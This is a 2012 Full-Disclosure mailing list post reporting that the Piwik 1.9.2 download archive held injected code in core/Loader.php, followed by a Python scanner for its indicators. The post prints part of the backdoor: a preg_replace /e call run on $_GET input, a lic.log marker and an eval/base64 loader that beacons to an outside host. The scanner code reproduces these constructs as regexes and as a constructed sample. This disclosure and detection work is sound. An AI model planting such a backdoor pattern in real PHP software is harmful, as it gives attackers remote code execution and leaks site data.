Open Source and information security mailing list archives
 
Message-ID: <50B3CE75.9060107@grobecker-wtal.de>
Date: Mon, 26 Nov 2012 21:17:57 +0100
From: Maximilian Grobecker <max@...becker-wtal.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Possible infection of Piwik 1.9.2 download archive

Hi,

this evening I downloaded a fresh archive of Piwik 1.9.2 and found this 
code at the bottom of the /piwik/core/Loader.php file:

(Just a short snippet)
-----------snip-------------
<?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
     preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
   }
   if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s 
[.......]

-----------/snip-------------


I decoded some parts of this code and found what it does:
It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and 
the request URI via POST to http://prostoivse.com/x.php and creates a 
file named "lic.log" in the same directory.
As long as this file exists it seems that no further POST requests are made.

At the moment I'm trying to figure out the further sense of this code, 
but it seems that there might also be some kind of backdoor (because of 
the use of $_GET).

The file in the downloadable archive is dated at
Nov 26, 2012 / 18:42 UTC.

From forums I know that some people downloaded the archive earlier this 
day and don't have this code inside their files.

At the moment (at 8:08 PM UTC) the archive is downloadable at the 
original Piwik web site with this obfuscated code.

I contacted the developers and managers of Piwik a few minutes ago about 
this.


-- 
Greetings from Wuppertal, Germany

Max Grobecker

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
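A defender-side check for the indicators this post describes, added here as an example that is neither the poster's nor the Piwik project's code. It flags the three constructs the message walks through (the /e preg_replace on $_GET, the eval/gzuncompress/base64_decode chain, and the lic.log marker) in PHP sources under a checkout; the sample file contents, the PLACEHOLDER blob and the function names scan_php_source / scan_tree are constructed for illustration.

```python
"""Scan a PHP tree for the constructs reported in the tampered Loader.php."""
import os
import re
from typing import Dict, List

# Each pattern corresponds to one behaviour the report attributes to the
# injected code; names and regexes are constructed for this example.
INDICATORS = {
    # code execution through the deprecated /e modifier on $_GET input
    "preg_replace_e_on_GET": re.compile(
        r'preg_replace\s*\(\s*["\']/.*?/[a-zA-Z]*e[a-zA-Z]*["\']\s*,\s*\$_GET',
        re.S),
    # layered decode-then-eval of an embedded blob
    "eval_gzuncompress_base64": re.compile(
        r'eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\('),
    # the lic.log marker that suppresses repeat beacons once it exists
    "lic_log_marker": re.compile(r'file_exists\s*\(.*?lic\.log', re.S),
}


def scan_php_source(source: str) -> List[str]:
    """Return the indicator names found in one PHP file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Map each suspicious path under root to the indicators it matches.
    A lic.log file anywhere in the tree is itself reported as a finding."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if fn == "lic.log":
                findings[path] = ["lic_log_marker_file_present"]
            elif fn.endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Constructed sample shaped like the snippet in the report; the payload
# blob is a placeholder, not the real one.
TAMPERED = ("<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {\n"
            "  preg_replace(\"/(.+)/e\", $_GET['g'], 'dwm'); exit; }\n"
            "if (file_exists(dirname(__FILE__).\"/lic.log\")) exit;\n"
            "eval(gzuncompress(base64_decode('PLACEHOLDER')));\n")
CLEAN = "<?php\nclass Loader { public static function autoload($c) {} }\n"

if __name__ == "__main__":
    print(scan_php_source(TAMPERED))  # all three indicator names
    print(scan_php_source(CLEAN))     # []
```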
